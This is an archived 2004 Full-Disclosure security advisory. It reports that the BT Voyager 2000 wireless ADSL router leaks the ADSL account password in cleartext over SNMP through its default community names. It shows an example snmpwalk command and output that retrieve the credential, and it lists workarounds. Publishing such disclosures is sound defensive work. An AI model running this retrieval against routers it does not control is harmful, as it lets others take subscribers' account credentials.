[Full-Disclosure] Wireless Modem (BT Voyager 2000 Wireless ADSL Router cleartext password)
From: Konstantin V. Gavrilenko (mlists_at_arhont.com)
Date: 06/22/04
- Previous message: Steffen Schumacher: "Re: [Full-Disclosure] PLEASE QUIT YACKING ABOUT M$"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: bugtraq@securityfocus.com, full-disclosure@lists.netsys.com Date: Tue, 22 Jun 2004 07:47:21 +0100
Arhont Ltd. - Information Security
Arhont Advisory by: Konstantin Gavrilenko (http://www.arhont.com)
Advisory: cleartext account password obtainable using SNMP
Class: design/configuration bug
Test platform: BT Voyager 2000 Wireless ADSL Router
Vendor Contact Date: 10/06/2004
PD* release date: 22/06/2004
DETAILS:
It is possible to obtain the ADSL account password from the wireless
side of the mentioned router. Provided the attacker can associate to the
router, he/she can grab SNMP strings from the router using default
public/private community name.
Furthermore, the information provided with public and private community
name are identical, differing only in that with private you can
obviously change the SNMP strings.
e.g.
root@abyrvalg:~# snmpwalk -v 1 -c public 192.168.1.1
SNMPv2-MIB::sysDescr.0 = STRING: BT Voyager 2000 Wireless ADSL Router
SNMPv2-MIB::sysObjectID.0 = OID: SNMPv2-SMI::enterprises.2535.111.6
SNMPv2-MIB::sysUpTime.0 = Timeticks: (260430184) 30 days, 1:02:01.84
[snip]
SNMPv2-SMI::transmission.23.2.3.1.5.5.1 = STRING:
"name.surname@btbroadband.com"
SNMPv2-SMI::transmission.23.2.3.1.5.6.1 = ""
SNMPv2-SMI::transmission.23.2.3.1.5.7.1 = ""
SNMPv2-SMI::transmission.23.2.3.1.5.8.1 = ""
SNMPv2-SMI::transmission.23.2.3.1.5.9.1 = ""
SNMPv2-SMI::transmission.23.2.3.1.5.10.1 = ""
SNMPv2-SMI::transmission.23.2.3.1.5.11.1 = ""
SNMPv2-SMI::transmission.23.2.3.1.5.12.1 = ""
SNMPv2-SMI::transmission.23.2.3.1.6.0.1 = ""
SNMPv2-SMI::transmission.23.2.3.1.6.0.2 = ""
SNMPv2-SMI::transmission.23.2.3.1.6.0.3 = ""
SNMPv2-SMI::transmission.23.2.3.1.6.0.4 = ""
SNMPv2-SMI::transmission.23.2.3.1.6.0.5 = ""
SNMPv2-SMI::transmission.23.2.3.1.6.0.6 = ""
SNMPv2-SMI::transmission.23.2.3.1.6.0.7 = ""
SNMPv2-SMI::transmission.23.2.3.1.6.0.8 = ""
SNMPv2-SMI::transmission.23.2.3.1.6.5.1 = STRING: "password"
[snip]
Risk Factor: High/Medium
Workarounds:
- Disallow anonymous access to the wireless router
- Change default SNMP community names
- Disable SNMP support
*According to the Arhont Ltd. policy, all of the found vulnerabilities
and security issues will be reported to the manufacturer 7 days before
releasing them to the public domains (such as CERT, BUGTRAQ, OSVDB).
If you would like to get more information about this issue, please do
not hesitate to contact Arhont team.
-- Respectfully, Konstantin V. Gavrilenko Arhont Ltd - Information Security web: http://www.arhont.com http://www.wi-foo.com e-mail: k.gavrilenko@arhont.com tel: +44 (0) 870 44 31337 fax: +44 (0) 117 969 0141 PGP: Key ID - 0x4F3608F7 PGP: Server - keyserver.pgp.com _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
- Previous message: Steffen Schumacher: "Re: [Full-Disclosure] PLEASE QUIT YACKING ABOUT M$"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
